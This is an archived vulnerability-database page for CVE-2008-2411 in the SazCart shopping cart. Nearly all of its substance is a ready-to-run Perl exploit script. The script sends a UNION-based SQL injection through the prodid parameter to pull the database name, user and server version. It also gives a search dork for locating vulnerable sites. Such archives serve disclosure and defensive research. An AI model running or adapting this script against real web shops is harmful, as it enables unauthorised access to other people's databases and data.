SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit


Arrow  SecurityAlert : 3900
Arrow  CVE : CVE-2008-2411
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : JosS
Arrow  Published : 22.05.2008

Arrow  Affected Software : SazCart <= v1.5.1



Arrow  Advisory Content :  

#!/usr/bin/perl

# SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit

# HomePage: http://www.sazcart.com

# Discovered & Coded by JosS

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team / Sys - Project / EspSeC

# http://www.spanish-hackers.com

# rgod forever :D

# Dork: "Powered by SazCart"

print "tt########################################################nn";

print "tt# SazCart <= v1.5.1 - Remote SQL Injection Exploit #nn";

print "tt# by JosS #nn";

print "tt########################################################nn";

use strict;

use LWP::UserAgent;

my $victim = $ARGV[0];

if(!$ARGV[0]) {

print "n[x] SazCart <= v1.5.1 - Remote SQL Injection Exploitn";

print "[x] written by JosS - sys-project[at]hotmail.comn";

print "[x] usage: perl xpl.pl [host]n";

print "[x] example: http://localhost/path/nn";

exit(1);

}

print "n[+] Exploiting...n";

my $cnx = LWP::UserAgent->new() or die;

my
$go=$cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(c
oncat(database(),char(58),user(),char(58),version()),char),3,4/*");

if ($go->content =~ m/Price</b>:(.*?)<br/ms)

{

print "[+] $1nn";

} else {

print "n[-] exploit failedn";

}






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.